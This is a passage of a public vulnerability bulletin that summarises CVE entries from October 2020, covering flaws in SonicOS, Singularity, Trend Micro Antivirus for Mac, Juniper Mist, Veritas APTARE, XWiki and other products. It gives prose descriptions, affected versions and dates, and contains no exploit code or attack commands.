A vulnerability has been identified in SIPORT MP (All versions < 3.2.1). Vulnerable versions of the device could allow an authenticated attacker to impersonate other users of the system and perform (potentially administrative) actions on behalf of those users if the single sign-on feature (“Allow logon without password”) is enabled. 2020-10-15 not yet calculated CVE-2020-7591
MISC
snyk — prototype_pollution
 
The package mathjs before 7.5.1 is vulnerable to Prototype Pollution via the deepExtend function that runs upon configuration updates. 2020-10-13 not yet calculated CVE-2020-7743
MISC
MISC
MISC
MISC
MISC
MISC
sonatype — nexus_repository_manager
 
A Directory Traversal issue was discovered in Sonatype Nexus Repository Manager 2.x before 2.14.19. A user that requests a crafted path can traverse up the file system to get access to content on disk (that the user running nxrm also has access to). 2020-10-12 not yet calculated CVE-2020-15012
CONFIRM
sonicos — sonicos
 
A buffer overflow vulnerability in SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS) on the firewall SSLVPN service and leads to firewall crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0. 2020-10-12 not yet calculated CVE-2020-5137
CONFIRM
sonicos — sonicos
 
A vulnerability in SonicOS allows a remote unauthenticated attacker to brute force Virtual Assist ticket ID in the firewall SSLVPN service. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0. 2020-10-12 not yet calculated CVE-2020-5141
CONFIRM
sonicos — sonicos
 
A Heap Overflow vulnerability in the SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS) on the firewall SSLVPN service and leads to SonicOS crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0. 2020-10-12 not yet calculated CVE-2020-5138
CONFIRM
sonicos — sonicos
 
A vulnerability in SonicOS allows an authenticated attacker to cause an out-of-bound invalid file reference that leads to a firewall crash. This vulnerability affected SonicOS Gen 6 version 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0. 2020-10-12 not yet calculated CVE-2020-5134
CONFIRM
sonicos — sonicos
 
A vulnerability in SonicOS allows a remote unauthenticated attacker to cause Denial of Service due to buffer overflow, which leads to a firewall crash. This vulnerability affected SonicOS Gen 6 version 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0. 2020-10-12 not yet calculated CVE-2020-5133
CONFIRM
sonicos — sonicos
 
A buffer overflow vulnerability in SonicOS allows a remote attacker to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a malicious request to the firewall. This vulnerability affected SonicOS Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0. 2020-10-12 not yet calculated CVE-2020-5135
CONFIRM
sonicos — sonicos
 
A buffer overflow vulnerability in SonicOS allows an authenticated attacker to cause Denial of Service (DoS) in the SSL-VPN and virtual assist portal, which leads to a firewall crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version 7.0.0.0. 2020-10-12 not yet calculated CVE-2020-5136
CONFIRM
sonicos — sonicos
 
A vulnerability in SonicOS allows a remote unauthenticated attacker to cause Denial of Service (DoS) on the firewall SSLVPN service by sending a malicious HTTP request that leads to a memory address leak. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0. 2020-10-12 not yet calculated CVE-2020-5140
CONFIRM
sonicos — sonicos
 
A vulnerability in SonicOS SSLVPN service allows a remote unauthenticated attacker to cause Denial of Service (DoS) due to the release of an invalid pointer, which leads to a firewall crash. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0. 2020-10-12 not yet calculated CVE-2020-5139
CONFIRM
sonicos — sonicos
 
SonicOS SSLVPN login page allows a remote unauthenticated attacker to perform firewall management administrator username enumeration based on the server responses. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0. 2020-10-12 not yet calculated CVE-2020-5143
CONFIRM
sonicos — sonicos
 
A stored cross-site scripting (XSS) vulnerability exists in the SonicOS SSLVPN web interface. A remote unauthenticated attacker is able to store and potentially execute arbitrary JavaScript code in the firewall SSLVPN portal. This vulnerability affected SonicOS Gen 5 version 5.9.1.7, 5.9.1.13, Gen 6 version 6.5.4.7, 6.5.1.12, 6.0.5.3, SonicOSv 6.5.4.v and Gen 7 version SonicOS 7.0.0.0. 2020-10-12 not yet calculated CVE-2020-5142
CONFIRM
sopel — channelmgnt
 
In the Channelmgnt plug-in for Sopel (a Python IRC bot) before version 1.0.3, malicious users are able to op/voice and take over a channel. This is an ACL bypass vulnerability. This plugin is bundled with MirahezeBot-Plugins with versions from 9.0.0 and less than 9.0.2 affected. Version 9.0.2 includes 1.0.3 of channelmgnt, and thus is safe from this vulnerability. See referenced GHSA-23pc-4339-95vg. 2020-10-13 not yet calculated CVE-2020-15251
MISC
MISC
CONFIRM
MISC
MISC
MISC
sylabs — singularity
 
Singularity (an open source container platform) from version 3.1.1 through 3.6.3 has a vulnerability. Due to insecure handling of path traversal and the lack of path sanitization within `unsquashfs`, it is possible to overwrite/create any files on the host filesystem during the extraction with a crafted squashfs filesystem. The extraction occurs automatically for unprivileged (either installation or with `allow setuid = no`) run of Singularity when a user attempts to run an image which is a local SIF image or a single file containing a squashfs filesystem and is coming from remote sources `library://` or `shub://`. Image build is also impacted in a more serious way as it can be used by a root user, allowing an attacker to overwrite/create files leading to a system compromise; so far, the bootstrap methods `library`, `shub` and `localimage` trigger the squashfs extraction. This issue is addressed in Singularity 3.6.4. All users are advised to upgrade to 3.6.4, especially if they use Singularity mainly for building images as the root user. There is no solid workaround except to temporarily avoid using unprivileged mode with single file images in favor of sandbox images instead. Regarding image build, temporarily avoid building from `library` and `shub` sources and as much as possible use `--fakeroot` or a VM for that. 2020-10-14 not yet calculated CVE-2020-15229
MISC
MISC
MISC
CONFIRM
telegram — telegram_desktop
 
Telegram Desktop through 2.4.3 does not require passcode entry upon pushing the Export key within the Export Telegram Data wizard. The threat model is a victim who has voluntarily opened Export Wizard but is then distracted. An attacker then approaches the unattended desktop and pushes the Export key. This attacker may consequently gain access to all chat conversation and media files. 2020-10-14 not yet calculated CVE-2020-25824
MISC
MISC
MISC
trend_micro — antivirus_for_mac
 
Trend Micro Antivirus for Mac 2020 (Consumer) contains a vulnerability in the product that occurs when a webserver is started that implements an API with several properties that can be read and written to allowing the attacker to gather and modify sensitive product and user data. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 2020-10-14 not yet calculated CVE-2020-27013
N/A
N/A
trend_micro — antivirus_for_mac_2020
 
Trend Micro Antivirus for Mac 2020 (Consumer) has a vulnerability in a specific kernel extension where an attacker could supply a kernel pointer and leak several bytes of memory. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability. 2020-10-14 not yet calculated CVE-2020-25778
N/A
N/A
trend_micro — antivirus_for_mac_2020
 
Trend Micro Antivirus for Mac 2020 (Consumer) is vulnerable to a specific kernel extension request attack where an attacker could bypass the Web Threat Protection feature of the product. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. 2020-10-14 not yet calculated CVE-2020-25777
N/A
N/A
trend_micro — antivirus_for_mac_2020
 
Trend Micro Antivirus for Mac 2020 (Consumer) has a vulnerability in which an Internationalized Domain Name homograph attack (Puny-code) could be used to add a malicious website to the approved websites list of Trend Micro Antivirus for Mac to bypass the web threat protection feature. 2020-10-13 not yet calculated CVE-2020-25779
MISC
juniper_networks — mist_cloud_ui
 
When Security Assertion Markup Language (SAML) authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly process invalid authentication certificates which could allow a malicious network-based user to access unauthorized data. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020. 2020-10-16 not yet calculated CVE-2020-1675
CONFIRM
juniper_networks — mist_cloud_ui
 
When SAML authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly handle child elements in SAML responses, allowing a remote attacker to modify a valid SAML response without invalidating its cryptographic signature to bypass SAML authentication security controls. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020. 2020-10-16 not yet calculated CVE-2020-1677
CONFIRM
united_planet — united_planet
 
Cross-site scripting (XSS) vulnerability in the search functionality in United Planet Intrexx Professional before 20.03 allows remote attackers to inject arbitrary web script or HTML via the request parameter. 2020-10-14 not yet calculated CVE-2020-24188
MISC
veritas — aptare

 

Veritas APTARE versions prior to 10.5 included code that bypassed the normal login process when specific authentication credentials were provided to the server. An unauthenticated user could login to the application and gain access to the data and functionality accessible to the targeted user account. 2020-10-15 not yet calculated CVE-2020-27157
MISC
veritas — aptare
 
Veritas APTARE versions prior to 10.5 did not perform adequate authorization checks. This vulnerability could allow for remote code execution by an unauthenticated user. 2020-10-15 not yet calculated CVE-2020-27156
MISC
vm-superio — vm-superio
 
In vm-superio before 0.1.1, the serial console FIFO can grow to unlimited memory usage when data is sent to the input source (i.e., standard input). This behavior cannot be reproduced from the guest side. When no rate limiting is in place, the host can be subject to memory pressure, impacting all other VMs running on the same host. 2020-10-16 not yet calculated CVE-2020-27173
MISC
MISC
vmware — horizon_client
 
VMware Horizon Client for Windows (5.x before 5.5.0) contains a denial-of-service vulnerability due to a file system access control issue during install time. Successful exploitation of this issue may allow an attacker to overwrite certain admin privileged files through a symbolic link attack at install time. This will result in a denial-of-service condition on the machine where Horizon Client for Windows is installed. 2020-10-16 not yet calculated CVE-2020-3991
MISC
windows — application_compatibility_client_library
 
An elevation of privilege vulnerability exists when the Windows Application Compatibility Client Library improperly handles registry operations, aka ‘Windows Application Compatibility Client Library Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16920. 2020-10-16 not yet calculated CVE-2020-16876
MISC
windows — remote_desktop_service
 
A denial of service vulnerability exists in Windows Remote Desktop Service when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Service Denial of Service Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16863
MISC
windows — visual_studio_code
 
A remote code execution vulnerability exists in Visual Studio Code when the Python extension loads a Jupyter notebook file, aka ‘Visual Studio Code Python Extension Remote Code Execution Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16977
MISC
wordpress — wordpress
 
Testimonial Rotator WordPress Plugin 3.0.2 is affected by Cross Site Scripting (XSS) in /wp-admin/post.php. If a user intercepts a request and inserts a payload in the “cite” parameter, the payload will be stored in the database. 2020-10-16 not yet calculated CVE-2020-26672
MISC
xwiki — xwiki
 
In XWiki before version 12.5 and 11.10.6, any user with SCRIPT right (EDIT right before XWiki 7.4) can gain access to the application server Servlet context which contains tools allowing to instantiate arbitrary Java objects and invoke methods that may lead to arbitrary code execution. This is patched in XWiki 12.5 and XWiki 11.10.6. 2020-10-16 not yet calculated CVE-2020-15252
CONFIRM
MISC
MISC


This product is provided subject to this Notification and this Privacy & Use policy.
